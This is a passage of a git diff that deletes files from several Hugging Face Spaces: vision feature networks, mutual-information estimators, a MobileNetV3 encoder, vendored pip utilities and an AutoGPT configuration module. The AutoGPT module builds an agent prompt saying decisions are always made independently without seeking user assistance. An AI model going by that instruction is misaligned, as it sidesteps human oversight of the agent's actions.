'vgg': - return VGG16() - else: - raise NotImplementedError('choose net_type from [alex, squeeze, vgg].') - - -class LinLayers(nn.ModuleList): - def __init__(self, n_channels_list: Sequence[int]): - super(LinLayers, self).__init__([ - nn.Sequential( - nn.Identity(), - nn.Conv2d(nc, 1, 1, 1, 0, bias=False) - ) for nc in n_channels_list - ]) - - for param in self.parameters(): - param.requires_grad = False - - -class BaseNet(nn.Module): - def __init__(self): - super(BaseNet, self).__init__() - - # register buffer - self.register_buffer( - 'mean', torch.Tensor([-.030, -.088, -.188])[None, :, None, None]) - self.register_buffer( - 'std', torch.Tensor([.458, .448, .450])[None, :, None, None]) - - def set_requires_grad(self, state: bool): - for param in chain(self.parameters(), self.buffers()): - param.requires_grad = state - - def z_score(self, x: torch.Tensor): - return (x - self.mean) / self.std - - def forward(self, x: torch.Tensor): - x = self.z_score(x) - - output = [] - for i, (_, layer) in enumerate(self.layers._modules.items(), 1): - x = layer(x) - if i in self.target_layers: - output.append(normalize_activation(x)) - if len(output) == len(self.target_layers): - break - return output - - -class SqueezeNet(BaseNet): - def __init__(self): - super(SqueezeNet, self).__init__() - - self.layers = models.squeezenet1_1(True).features - self.target_layers = [2, 5, 8, 10, 11, 12, 13] - self.n_channels_list = [64, 128, 256, 384, 384, 512, 512] - - self.set_requires_grad(False) - - -class AlexNet(BaseNet): - def __init__(self): - 
super(AlexNet, self).__init__() - - self.layers = models.alexnet(True).features - self.target_layers = [2, 5, 8, 10, 12] - self.n_channels_list = [64, 192, 384, 256, 256] - - self.set_requires_grad(False) - - -class VGG16(BaseNet): - def __init__(self): - super(VGG16, self).__init__() - - self.layers = models.vgg16(True).features - self.target_layers = [4, 9, 16, 23, 30] - self.n_channels_list = [64, 128, 256, 512, 512] - - self.set_requires_grad(False) \ No newline at end of file diff --git a/spaces/akalin/DeepDanbooru_string/README.md b/spaces/akalin/DeepDanbooru_string/README.md deleted file mode 100644 index 4330b6f969246dc764a34ea254d2e807159f1c55..0000000000000000000000000000000000000000 --- a/spaces/akalin/DeepDanbooru_string/README.md +++ /dev/null @@ -1,39 +0,0 @@ ---- -title: DeepDanbooru String -emoji: 💬 -colorFrom: blue -colorTo: red -sdk: gradio -sdk_version: 3.6 -app_file: app.py -pinned: false -duplicated_from: NoCrypt/DeepDanbooru_string ---- - -# Configuration - -`title`: _string_ -Display title for the Space - -`emoji`: _string_ -Space emoji (emoji-only character allowed) - -`colorFrom`: _string_ -Color for Thumbnail gradient (red, yellow, green, blue, indigo, purple, pink, gray) - -`colorTo`: _string_ -Color for Thumbnail gradient (red, yellow, green, blue, indigo, purple, pink, gray) - -`sdk`: _string_ -Can be either `gradio`, `streamlit`, or `static` - -`sdk_version` : _string_ -Only applicable for `streamlit` SDK. -See [doc](https://hf.co/docs/hub/spaces) for more info on supported versions. - -`app_file`: _string_ -Path to your main application file (which contains either `gradio` or `streamlit` Python code, or `static` html code). -Path is relative to the root of the repository. - -`pinned`: _boolean_ -Whether the Space stays on top of your list. 
diff --git a/spaces/akhaliq/VQMIVC/mi_estimators.py b/spaces/akhaliq/VQMIVC/mi_estimators.py deleted file mode 100644 index 27e08155720c4f9b4c993c6aff86aaedf1cfc014..0000000000000000000000000000000000000000 --- a/spaces/akhaliq/VQMIVC/mi_estimators.py +++ /dev/null @@ -1,201 +0,0 @@ -''' -Modified from: https://github.com/Linear95/CLUB -''' - -import torch -import torch.nn as nn - -class CLUB(nn.Module): # CLUB: Mutual Information Contrastive Learning Upper Bound - ''' - This class provides the CLUB estimation to I(X,Y) - Method: - mi_est() : provides the estimation with input samples - loglikeli() : provides the log-likelihood of the approximation q(Y|X) with input samples - Arguments: - x_dim, y_dim : the dimensions of samples from X, Y respectively - hidden_size : the dimension of the hidden layer of the approximation network q(Y|X) - x_samples, y_samples : samples from X and Y, having shape [sample_size, x_dim/y_dim] - ''' - def __init__(self, x_dim, y_dim, hidden_size): - super(CLUB, self).__init__() - # p_mu outputs mean of q(Y|X) - self.p_mu = nn.Sequential(nn.Linear(x_dim, hidden_size//2), - nn.ReLU(), - nn.Linear(hidden_size//2, y_dim)) - # p_logvar outputs log of variance of q(Y|X) - self.p_logvar = nn.Sequential(nn.Linear(x_dim, hidden_size//2), - nn.ReLU(), - nn.Linear(hidden_size//2, y_dim), - nn.Tanh()) - # self.p_logvar = nn.Sequential(nn.Linear(x_dim, hidden_size//2), - # nn.ReLU(), - # nn.Linear(hidden_size//2, y_dim)) - - def get_mu_logvar(self, x_samples): - mu = self.p_mu(x_samples) - logvar = self.p_logvar(x_samples) - return mu, logvar - - def mi_est(self, x_samples, y_samples): - mu, logvar = self.get_mu_logvar(x_samples) - - # log of conditional probability of positive sample pairs - positive = - (mu - y_samples)**2 /2./logvar.exp() - - prediction_1 = mu.unsqueeze(1) # shape [nsample,1,dim] - y_samples_1 = y_samples.unsqueeze(0) # shape [1,nsample,dim] - - # log of conditional probability of negative sample pairs - negative = - ((y_samples_1 - prediction_1)**2).mean(dim=1)/2./logvar.exp() - - return (positive.sum(dim = -1) - negative.sum(dim = -1)).mean() - - def loglikeli(self, x_samples, y_samples): # unnormalized loglikelihood - mu, logvar = self.get_mu_logvar(x_samples) - return (-(mu - y_samples)**2 /logvar.exp()-logvar).sum(dim=1).mean(dim=0) - - - -class CLUBSample(nn.Module): # Sampled version of the CLUB estimator - def __init__(self, x_dim, y_dim, hidden_size): - super(CLUBSample, self).__init__() - self.p_mu = nn.Sequential(nn.Linear(x_dim, hidden_size//2), - nn.ReLU(), - nn.Linear(hidden_size//2, hidden_size//2), - nn.ReLU(), - nn.Linear(hidden_size//2, hidden_size//2), - nn.ReLU(), - nn.Linear(hidden_size//2, y_dim)) - - self.p_logvar = nn.Sequential(nn.Linear(x_dim, hidden_size//2), - nn.ReLU(), - nn.Linear(hidden_size//2, hidden_size//2), - nn.ReLU(), - nn.Linear(hidden_size//2, hidden_size//2), - nn.ReLU(), - nn.Linear(hidden_size//2, y_dim), - nn.Tanh()) - - def get_mu_logvar(self, x_samples): - mu = self.p_mu(x_samples) - logvar = self.p_logvar(x_samples) - return mu, logvar - - - def loglikeli(self, x_samples, y_samples): - mu, logvar = self.get_mu_logvar(x_samples) - return (-(mu - y_samples)**2 /logvar.exp()-logvar).sum(dim=1).mean(dim=0) - - - def mi_est(self, x_samples, y_samples): - mu, logvar = self.get_mu_logvar(x_samples) - - sample_size = x_samples.shape[0] - #random_index = torch.randint(sample_size, (sample_size,)).long() - random_index = torch.randperm(sample_size).long() - - positive = - (mu - y_samples)**2 / logvar.exp() - negative = 
- (mu - y_samples[random_index])**2 / logvar.exp() - upper_bound = (positive.sum(dim = -1) - negative.sum(dim = -1)).mean() - return upper_bound/2. - - -class CLUBSample_reshape(nn.Module): # Sampled version of the CLUB estimator - def __init__(self, x_dim, y_dim, hidden_size): - super(CLUBSample_reshape, self).__init__() - self.p_mu = nn.Sequential(nn.Linear(x_dim, hidden_size//2), - nn.ReLU(), - nn.Linear(hidden_size//2, hidden_size//2), - nn.ReLU(), - nn.Linear(hidden_size//2, hidden_size//2), - nn.ReLU(), - nn.Linear(hidden_size//2, y_dim)) - - self.p_logvar = nn.Sequential(nn.Linear(x_dim, hidden_size//2), - nn.ReLU(), - nn.Linear(hidden_size//2, hidden_size//2), - nn.ReLU(), - nn.Linear(hidden_size//2, hidden_size//2), - nn.ReLU(), - nn.Linear(hidden_size//2, y_dim), - nn.Tanh()) - - def get_mu_logvar(self, x_samples): - mu = self.p_mu(x_samples) - logvar = self.p_logvar(x_samples) - return mu, logvar - - - def loglikeli(self, x_samples, y_samples): - mu, logvar = self.get_mu_logvar(x_samples) - mu = mu.reshape(-1, mu.shape[-1]) # (bs, y_dim) -> (bs, 1, y_dim) -> (bs, T, y_dim) -> (bs*T, y_dim) - logvar = logvar.reshape(-1, logvar.shape[-1]) - y_samples = y_samples.reshape(-1, y_samples.shape[-1]) # (bs, T, y_dim) -> (bs*T, y_dim) - return (-(mu - y_samples)**2 /logvar.exp()-logvar).sum(dim=1).mean(dim=0) - - - def mi_est(self, x_samples, y_samples): - mu, logvar = self.get_mu_logvar(x_samples) - sample_size = mu.shape[0] - random_index = torch.randperm(sample_size).long() - y_shuffle = y_samples[random_index] - mu = mu.reshape(-1, mu.shape[-1]) # (bs, y_dim) -> (bs, 1, y_dim) -> (bs, T, y_dim) -> (bs*T, y_dim) - logvar = logvar.reshape(-1, logvar.shape[-1]) - y_samples = y_samples.reshape(-1, y_samples.shape[-1]) # (bs, T, y_dim) -> (bs*T, y_dim) - y_shuffle = y_shuffle.reshape(-1, y_shuffle.shape[-1]) # (bs, T, y_dim) -> (bs*T, y_dim) - - positive = - (mu - y_samples)**2 / logvar.exp() - negative = - (mu - y_shuffle)**2 / logvar.exp() - upper_bound = (positive.sum(dim = -1) - negative.sum(dim = -1)).mean() - return upper_bound/2. 
- - -class CLUBSample_group(nn.Module): # Sampled version of the CLUB estimator - def __init__(self, x_dim, y_dim, hidden_size): - super(CLUBSample_group, self).__init__() - self.p_mu = nn.Sequential(nn.Linear(x_dim, hidden_size//2), - nn.ReLU(), - nn.Linear(hidden_size//2, hidden_size//2), - nn.ReLU(), - nn.Linear(hidden_size//2, hidden_size//2), - nn.ReLU(), - nn.Linear(hidden_size//2, y_dim)) - - self.p_logvar = nn.Sequential(nn.Linear(x_dim, hidden_size//2), - nn.ReLU(), - nn.Linear(hidden_size//2, hidden_size//2), - nn.ReLU(), - nn.Linear(hidden_size//2, hidden_size//2), - nn.ReLU(), - nn.Linear(hidden_size//2, y_dim), - nn.Tanh()) - - def get_mu_logvar(self, x_samples): - mu = self.p_mu(x_samples) - logvar = self.p_logvar(x_samples) - return mu, logvar - - - def loglikeli(self, x_samples, y_samples): # unnormalized loglikelihood - mu, logvar = self.get_mu_logvar(x_samples) # mu/logvar: (bs, y_dim) - mu = mu.unsqueeze(1).expand(-1, y_samples.shape[1], -1).reshape(-1, mu.shape[-1]) # (bs, y_dim) -> (bs, 1, y_dim) -> (bs, T, y_dim) -> (bs*T, y_dim) - logvar = logvar.unsqueeze(1).expand(-1, y_samples.shape[1], -1).reshape(-1, logvar.shape[-1]) - y_samples = y_samples.reshape(-1, y_samples.shape[-1]) # (bs, T, y_dim) -> (bs*T, y_dim) - return (-(mu - y_samples)**2 /logvar.exp()-logvar).sum(dim=1).mean(dim=0) / 2 - - def mi_est(self, x_samples, y_samples): # x_samples: (bs, x_dim); y_samples: (bs, T, y_dim) - mu, logvar = self.get_mu_logvar(x_samples) - - sample_size = x_samples.shape[0] - #random_index = torch.randint(sample_size, (sample_size,)).long() - random_index = torch.randperm(sample_size).long() - - # log of conditional probability of positive sample pairs - mu_exp1 = mu.unsqueeze(1).expand(-1, y_samples.shape[1], -1) # (bs, y_dim) -> (bs, T, y_dim) - # logvar_exp1 = logvar.unqueeze(1).expand(-1, y_samples.shape[1], -1).reshape(-1, logvar.shape[-1]) - positive = - ((mu_exp1 - y_samples)**2).mean(dim=1) / logvar.exp() # mean along T - negative = - ((mu_exp1 - y_samples[random_index])**2).mean(dim=1) / logvar.exp() # mean along T - - return (positive.sum(dim = -1) - negative.sum(dim = -1)).mean() / 2 - - diff --git a/spaces/akhaliq/deeplab2/model/encoder/mobilenet.py b/spaces/akhaliq/deeplab2/model/encoder/mobilenet.py deleted file mode 100644 index 5bb1a8d1a3a1ac0c4a59b53f3c663d62cc95a689..0000000000000000000000000000000000000000 --- a/spaces/akhaliq/deeplab2/model/encoder/mobilenet.py +++ /dev/null @@ -1,410 +0,0 @@ -# coding=utf-8 -# Copyright 2021 The Deeplab2 Authors. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - -"""MobileNetV3 models for Deep Labeling. - -Reference: - Howard, A., Sandler, M., et al. Searching for mobilenetv3. In ICCV, 2019 -""" -from typing import Any, Callable, Mapping, Optional, Sequence - -import tensorflow as tf - -from deeplab2.model import utils -from deeplab2.model.layers import blocks -from deeplab2.model.layers import convolutions - -# The default input image channels. 
-_INPUT_CHANNELS = 3 - - -MNV3Small_BLOCK_SPECS = { - 'spec_name': 'MobileNetV3Small', - 'block_spec_schema': ['block_fn', 'kernel_size', 'strides', 'filters', - 'activation', 'se_ratio', 'expand_ratio', - 'is_endpoint'], - 'block_specs': [ - ('conv_bn', 3, 2, 16, - 'hard_swish', None, None, True), - ('inverted_bottleneck', 3, 2, 16, - 'relu', 0.25, 1, True), - ('inverted_bottleneck', 3, 2, 24, - 'relu', None, 72. / 16, False), - ('inverted_bottleneck', 3, 1, 24, - 'relu', None, 88. / 24, True), - ('inverted_bottleneck', 5, 2, 40, - 'hard_swish', 0.25, 4., False), - ('inverted_bottleneck', 5, 1, 40, - 'hard_swish', 0.25, 6., False), - ('inverted_bottleneck', 5, 1, 40, - 'hard_swish', 0.25, 6., False), - ('inverted_bottleneck', 5, 1, 48, - 'hard_swish', 0.25, 3., False), - ('inverted_bottleneck', 5, 1, 48, - 'hard_swish', 0.25, 3., True), - ('inverted_bottleneck', 5, 2, 96, - 'hard_swish', 0.25, 6., False), - ('inverted_bottleneck', 5, 1, 96, - 'hard_swish', 0.25, 6., False), - ('inverted_bottleneck', 5, 1, 96, - 'hard_swish', 0.25, 6., False), - ('conv_bn', 1, 1, 576, - 'hard_swish', None, None, True), - ] -} - - -MNV3Large_BLOCK_SPECS = { - 'spec_name': 'MobileNetV3Large', - 'block_spec_schema': ['block_fn', 'kernel_size', 'strides', 'filters', - 'activation', 'se_ratio', 'expand_ratio', - 'is_endpoint'], - 'block_specs': [ - ('conv_bn', 3, 2, 16, - 'hard_swish', None, None, False), - ('inverted_bottleneck', 3, 1, 16, - 'relu', None, 1., True), - ('inverted_bottleneck', 3, 2, 24, - 'relu', None, 4., False), - ('inverted_bottleneck', 3, 1, 24, - 'relu', None, 3., True), - ('inverted_bottleneck', 5, 2, 40, - 'relu', 0.25, 3., False), - ('inverted_bottleneck', 5, 1, 40, - 'relu', 0.25, 3., False), - ('inverted_bottleneck', 5, 1, 40, - 'relu', 0.25, 3., True), - ('inverted_bottleneck', 3, 2, 80, - 'hard_swish', None, 6., False), - ('inverted_bottleneck', 3, 1, 80, - 'hard_swish', None, 2.5, False), - ('inverted_bottleneck', 3, 1, 80, - 'hard_swish', None, 2.3, False), - ('inverted_bottleneck', 3, 1, 80, - 'hard_swish', None, 2.3, False), - ('inverted_bottleneck', 3, 1, 112, - 'hard_swish', 0.25, 6., False), - ('inverted_bottleneck', 3, 1, 112, - 'hard_swish', 0.25, 6., True), - ('inverted_bottleneck', 5, 2, 160, - 'hard_swish', 0.25, 6., False), - ('inverted_bottleneck', 5, 1, 160, - 'hard_swish', 0.25, 6., False), - ('inverted_bottleneck', 5, 1, 160, - 'hard_swish', 0.25, 6., False), - ('conv_bn', 1, 1, 960, - 'hard_swish', None, None, True), - ] -} - - -SUPPORTED_SPECS_MAP = { - 'MobileNetV3Large': MNV3Large_BLOCK_SPECS, - 'MobileNetV3Small': MNV3Small_BLOCK_SPECS, -} - - -# pylint: disable=invalid-name -def _block_spec_decoder(specs: Mapping[Any, Any], - width_multiplier: float, - divisible_by: int = 8) -> Sequence[Mapping[str, Any]]: - """Decodes specs for a block. - - Args: - specs: A `dict` specification of block specs of a mobilenet version. - width_multiplier: A `float` multiplier for the filter size for all - convolution ops. The value must be greater than zero. Typical usage will - be to set this value in (0, 1) to reduce the number of parameters or - computation cost of the model. - divisible_by: An `int` that ensures all inner dimensions are divisible by - this number. - - Returns: - A list of block spec in dictionary that defines structure of the layers. 
- """ - - spec_name = specs['spec_name'] - block_spec_schema = specs['block_spec_schema'] - block_specs = specs['block_specs'] - - if not block_specs: - raise ValueError( - 'The block spec cannot be empty for {} !'.format(spec_name)) - - if len(block_specs[0]) != len(block_spec_schema): - raise ValueError('The block spec values {} do not match with ' - 'the schema {}'.format(block_specs[0], block_spec_schema)) - - decoded_specs = [] - - for spec in block_specs: - spec_dict = dict(zip(block_spec_schema, spec)) - decoded_specs.append(spec_dict) - - for ds in decoded_specs: - ds['filters'] = utils.make_divisible( - value=ds['filters'] * width_multiplier, - divisor=divisible_by, - min_value=8) - - return decoded_specs -# pylint: enable=invalid-name - - -class MobileNet(tf.keras.Model): - """Creates a MobileNetV3 family model.""" - - def __init__( - self, - model_id: str = 'MobileNetV3Small', - width_multiplier: float = 1.0, - output_stride: Optional[int] = None, - min_width: int = 8, - divisible_by: int = 8, - regularize_depthwise: bool = False, - bn_layer: Callable[..., Any] = tf.keras.layers.BatchNormalization, - conv_kernel_weight_decay: float = 0.0, - name: str = 'MobilenNetV3'): - """Initializes a MobileNet V3 model. - - Args: - model_id: A `str` of MobileNet version. The supported values are - `MobileNetV3Large`, `MobileNetV3Small`. - width_multiplier: A `float` of multiplier for the filters (number of - channels) for all convolution ops. The value must be greater than zero. - Typical usage will be to set this value in (0, 1) to reduce the number - of parameters or computation cost of the model. - output_stride: An `int` that specifies the requested ratio of input to - output spatial resolution. If not None, then we invoke atrous - convolution if necessary to prevent the network from reducing the - spatial resolution of activation maps. The output_stride should be - divisible by 4. - min_width: An `int` of minimum width (number of channels) for all - convolution ops. Enforced when width_multiplier < 1, and not an active - constraint when width_multiplier >= 1. - divisible_by: An `int` that ensures all intermediate feature dimensions - are divisible by this number. - regularize_depthwise: If True, apply regularization on depthwise conv. - bn_layer: An optional tf.keras.layers.Layer that computes the - normalization (default: tf.keras.layers.BatchNormalization). - conv_kernel_weight_decay: A float, the weight decay for convolution - kernels. - name: Model name. - - Raises: - ValueError: The MobileNet version is not supported. - ValueError: width_multiplier is not greater than zero. - ValueError: Output stride must be None or a multiple of 4. - ValueError: Unknown block type i for layer j. 
- """ - if model_id not in SUPPORTED_SPECS_MAP: - raise ValueError('The MobileNet version {} ' - 'is not supported'.format(model_id)) - - if width_multiplier <= 0: - raise ValueError('width_multiplier is not greater than zero.') - - if (output_stride is not None and - (output_stride <= 1 or (output_stride > 1 and output_stride % 4))): - raise ValueError('Output stride must be None or a multiple of 4.') - - super().__init__(name=name) - - self._model_id = model_id - self._width_multiplier = width_multiplier - self._min_width = min_width - self._output_stride = output_stride - self._divisible_by = divisible_by - self._regularize_depthwise = regularize_depthwise - self._bn_layer = bn_layer - self._conv_kernel_weight_decay = conv_kernel_weight_decay - self._blocks = [] - self._endpoint_names = [] - - block_specs = SUPPORTED_SPECS_MAP.get(model_id) - self._decoded_specs = _block_spec_decoder( - specs=block_specs, - width_multiplier=self._width_multiplier, - divisible_by=self._divisible_by) - - self._mobilenet_base() - - def _mobilenet_base(self): - """Builds the base MobileNet architecture.""" - - # The current_stride variable keeps track of the output stride of the - # activations, i.e., the running product of convolution strides up to the - # current network layer. This allows us to invoke atrous convolution - # whenever applying the next convolution would result in the activations - # having output stride larger than the target output_stride. - current_stride = 1 - - # The atrous convolution rate parameter. - rate = 1 - - endpoint_level = 1 - in_filters = _INPUT_CHANNELS - for i, block_def in enumerate(self._decoded_specs): - # We only need to build up to 'res5' endpoint for segmentation task. - if endpoint_level > 5 and not self._classification_mode: - break - - block_name = '{}_{}'.format(block_def['block_fn'], i + 1) - - if (self._output_stride is not None and - current_stride == self._output_stride): - # If we have reached the target output_stride, then we need to employ - # atrous convolution with stride=1 and multiply the atrous rate by the - # current unit's stride for use in subsequent layers. - layer_stride = 1 - layer_rate = rate - rate = ( - rate * block_def['strides'] - if block_def['strides'] is not None else rate) - else: - layer_stride = block_def['strides'] - layer_rate = 1 - current_stride = ( - current_stride * block_def['strides'] - if block_def['strides'] is not None else current_stride) - - if block_def['block_fn'] == 'conv_bn': - - self._blocks.append( - convolutions.Conv2DSame( - output_channels=block_def['filters'], - kernel_size=block_def['kernel_size'], - strides=layer_stride, - atrous_rate=layer_rate, - activation=block_def['activation'], - use_bias=False, - bn_layer=self._bn_layer, - use_bn=True, - conv_kernel_weight_decay=self._conv_kernel_weight_decay, - name=block_name, - )) - - elif block_def['block_fn'] == 'inverted_bottleneck': - atrous_rate = 1 - # There is no need to apply atrous convolution to any 1x1 convolution. 
- if layer_rate > 1 and block_def['kernel_size'] != 1: - atrous_rate = layer_rate - self._blocks.append( - blocks.InvertedBottleneckBlock( - in_filters=in_filters, - out_filters=block_def['filters'], - expand_ratio=block_def['expand_ratio'], - strides=layer_stride, - kernel_size=block_def['kernel_size'], - se_ratio=block_def['se_ratio'], - activation=block_def['activation'], - expand_se_in_filters=True, - depthwise_activation=None, - atrous_rate=atrous_rate, - divisible_by=self._divisible_by, - regularize_depthwise=self._regularize_depthwise, - use_depthwise=True, - # Note that whether the residual connection would be used is - # also conditional on the in_filters and out_filters size, even - # if use_residual=True,e.g. when input_filters != out_filters, - # no residual connection will be created. - use_residual=(block_def['strides'] == 1), - bn_layer=self._bn_layer, - conv_kernel_weight_decay=self._conv_kernel_weight_decay, - name=block_name, - )) - - else: - raise ValueError('Unknown block type {} for layer {}'.format( - block_def['block_fn'], i)) - - # Register input_filters for the next level - in_filters = block_def['filters'] - - if block_def['is_endpoint']: - # Name the endpoint to be 'res{1...5}' to align with ResNet. This - # simplifies segmentation head implementation. - self._endpoint_names.append('res' + str(endpoint_level)) - endpoint_level += 1 - else: - self._endpoint_names.append(None) - - def call(self, input_tensor: tf.Tensor, training: bool = False): - """Performs a forward pass through MobileNet.""" - net = input_tensor - endpoints = {} - for block, endpoint_name in zip(self._blocks, self._endpoint_names): - net = block(net, training=training) - if endpoint_name is not None: - endpoints[endpoint_name] = net - return endpoints - - -def MobileNetV3Small( - width_multiplier: float = 1.0, - output_stride: int = 32, - bn_layer: Callable[..., Any] = tf.keras.layers.BatchNormalization, - conv_kernel_weight_decay: float = 0.0, - name: str = 'MobileNetV3Small') -> tf.keras.Model: - """Creates a MobileNetV3Small model. - - Args: - width_multiplier: A float, depth_multiplier for the whole model. - output_stride: An optional integer specifying the output stride of the - network. - bn_layer: An optional tf.keras.layers.Layer that computes the - normalization (default: tf.keras.layers.BatchNormalization). - conv_kernel_weight_decay: A float, the weight decay for convolution kernels. - name: Model name. - - Returns: - The MobileNetV3Small model as an instance of tf.keras.Model. - """ - model = MobileNet(model_id='MobileNetV3Small', - width_multiplier=width_multiplier, - output_stride=output_stride, - bn_layer=bn_layer, - conv_kernel_weight_decay=conv_kernel_weight_decay, - name=name) - return model - - -def MobileNetV3Large( - width_multiplier: float = 1.0, - output_stride: int = 32, - bn_layer: Callable[..., Any] = tf.keras.layers.BatchNormalization, - conv_kernel_weight_decay: float = 0.0, - name: str = 'MobileNetV3Large') -> tf.keras.Model: - """Creates a MobileNetV3Large model. - - Args: - width_multiplier: A float, depth_multiplier for the STEM. - output_stride: An optional integer specifying the output stride of the - network. - bn_layer: An optional tf.keras.layers.Layer that computes the - normalization (default: tf.keras.layers.BatchNormalization). - conv_kernel_weight_decay: A float, the weight decay for convolution kernels. - name: Model name. - - Returns: - The MobileNetV3Large model as an instance of tf.keras.Model. 
- """ - model = MobileNet(model_id='MobileNetV3Large', - width_multiplier=width_multiplier, - output_stride=output_stride, - bn_layer=bn_layer, - conv_kernel_weight_decay=conv_kernel_weight_decay, - name=name) - return model diff --git a/spaces/alexray/btc_predictor/venv/lib/python3.10/site-packages/pip/_vendor/cachecontrol/_cmd.py b/spaces/alexray/btc_predictor/venv/lib/python3.10/site-packages/pip/_vendor/cachecontrol/_cmd.py deleted file mode 100644 index 4266b5ee92a24b5e0ef65689a1b94a98bb4a9b56..0000000000000000000000000000000000000000 --- a/spaces/alexray/btc_predictor/venv/lib/python3.10/site-packages/pip/_vendor/cachecontrol/_cmd.py +++ /dev/null @@ -1,61 +0,0 @@ -# SPDX-FileCopyrightText: 2015 Eric Larson -# -# SPDX-License-Identifier: Apache-2.0 - -import logging - -from pip._vendor import requests - -from pip._vendor.cachecontrol.adapter import CacheControlAdapter -from pip._vendor.cachecontrol.cache import DictCache -from pip._vendor.cachecontrol.controller import logger - -from argparse import ArgumentParser - - -def setup_logging(): - logger.setLevel(logging.DEBUG) - handler = logging.StreamHandler() - logger.addHandler(handler) - - -def get_session(): - adapter = CacheControlAdapter( - DictCache(), cache_etags=True, serializer=None, heuristic=None - ) - sess = requests.Session() - sess.mount("http://", adapter) - sess.mount("https://", adapter) - - sess.cache_controller = adapter.controller - return sess - - -def get_args(): - parser = ArgumentParser() - parser.add_argument("url", help="The URL to try and cache") - return parser.parse_args() - - -def main(args=None): - args = get_args() - sess = get_session() - - # Make a request to get a response - resp = sess.get(args.url) - - # Turn on logging - setup_logging() - - # try setting the cache - sess.cache_controller.cache_response(resp.request, resp.raw) - - # Now try to get it - if sess.cache_controller.cached_request(resp.request): - print("Cached!") - else: - print("Not cached :(") - - -if __name__ == "__main__": - main() diff --git a/spaces/alexray/btc_predictor/venv/lib/python3.10/site-packages/pip/_vendor/html5lib/_trie/__init__.py b/spaces/alexray/btc_predictor/venv/lib/python3.10/site-packages/pip/_vendor/html5lib/_trie/__init__.py deleted file mode 100644 index 07bad5d31c1ec7aa7ac081dac5586db91f3c5a99..0000000000000000000000000000000000000000 --- a/spaces/alexray/btc_predictor/venv/lib/python3.10/site-packages/pip/_vendor/html5lib/_trie/__init__.py +++ /dev/null @@ -1,5 +0,0 @@ -from __future__ import absolute_import, division, unicode_literals - -from .py import Trie - -__all__ = ["Trie"] diff --git a/spaces/aliabid94/AutoGPT/autogpt/config/ai_config.py b/spaces/aliabid94/AutoGPT/autogpt/config/ai_config.py deleted file mode 100644 index d50c30beee9dc8009f63415378ae1c6a399f0037..0000000000000000000000000000000000000000 --- a/spaces/aliabid94/AutoGPT/autogpt/config/ai_config.py +++ /dev/null @@ -1,121 +0,0 @@ -# sourcery skip: do-not-use-staticmethod -""" -A module that contains the AIConfig class object that contains the configuration -""" -from __future__ import annotations - -import os -from typing import Type - -import yaml - - -class AIConfig: - """ - A class object that contains the configuration information for the AI - - Attributes: - ai_name (str): The name of the AI. - ai_role (str): The description of the AI's role. - ai_goals (list): The list of objectives the AI is supposed to complete. 
- """ - - def __init__( - self, ai_name: str = "", ai_role: str = "", ai_goals: list | None = None - ) -> None: - """ - Initialize a class instance - - Parameters: - ai_name (str): The name of the AI. - ai_role (str): The description of the AI's role. - ai_goals (list): The list of objectives the AI is supposed to complete. - Returns: - None - """ - if ai_goals is None: - ai_goals = [] - self.ai_name = ai_name - self.ai_role = ai_role - self.ai_goals = ai_goals - - # Soon this will go in a folder where it remembers more stuff about the run(s) - SAVE_FILE = os.path.join(os.path.dirname(__file__), "..", "ai_settings.yaml") - - @staticmethod - def load(config_file: str = SAVE_FILE) -> "AIConfig": - """ - Returns class object with parameters (ai_name, ai_role, ai_goals) loaded from - yaml file if yaml file exists, - else returns class with no parameters. - - Parameters: - config_file (int): The path to the config yaml file. - DEFAULT: "../ai_settings.yaml" - - Returns: - cls (object): An instance of given cls object - """ - - try: - with open(config_file, encoding="utf-8") as file: - config_params = yaml.load(file, Loader=yaml.FullLoader) - except FileNotFoundError: - config_params = {} - - ai_name = config_params.get("ai_name", "") - ai_role = config_params.get("ai_role", "") - ai_goals = config_params.get("ai_goals", []) - # type: Type[AIConfig] - return AIConfig(ai_name, ai_role, ai_goals) - - def save(self, config_file: str = SAVE_FILE) -> None: - """ - Saves the class parameters to the specified file yaml file path as a yaml file. - - Parameters: - config_file(str): The path to the config yaml file. - DEFAULT: "../ai_settings.yaml" - - Returns: - None - """ - - config = { - "ai_name": self.ai_name, - "ai_role": self.ai_role, - "ai_goals": self.ai_goals, - } - with open(config_file, "w", encoding="utf-8") as file: - yaml.dump(config, file, allow_unicode=True) - - def construct_full_prompt(self) -> str: - """ - Returns a prompt to the user with the class information in an organized fashion. - - Parameters: - None - - Returns: - full_prompt (str): A string containing the initial prompt for the user - including the ai_name, ai_role and ai_goals. - """ - - prompt_start = ( - "Your decisions must always be made independently without" - " seeking user assistance. Play to your strengths as an LLM and pursue" - " simple strategies with no legal complications." - "" - ) - - from autogpt.prompt import get_prompt - - # Construct full prompt - full_prompt = ( - f"You are {self.ai_name}, {self.ai_role}\n{prompt_start}\n\nGOALS:\n\n" - ) - for i, goal in enumerate(self.ai_goals): - full_prompt += f"{i+1}. {goal}\n" - - full_prompt += f"\n\n{get_prompt()}" - return full_prompt diff --git a/spaces/amarchheda/ChordDuplicate/portaudio/src/hostapi/wasapi/mingw-include/winapifamily.h b/spaces/amarchheda/ChordDuplicate/portaudio/src/hostapi/wasapi/mingw-include/winapifamily.h deleted file mode 100644 index 388d5f068cba2b5e2e642f68bea924d61f37f404..0000000000000000000000000000000000000000 --- a/spaces/amarchheda/ChordDuplicate/portaudio/src/hostapi/wasapi/mingw-include/winapifamily.h +++ /dev/null @@ -1,24 +0,0 @@ -/** - * This file is part of the mingw-w64 runtime package. - * No warranty is given; refer to the file DISCLAIMER within this package. 
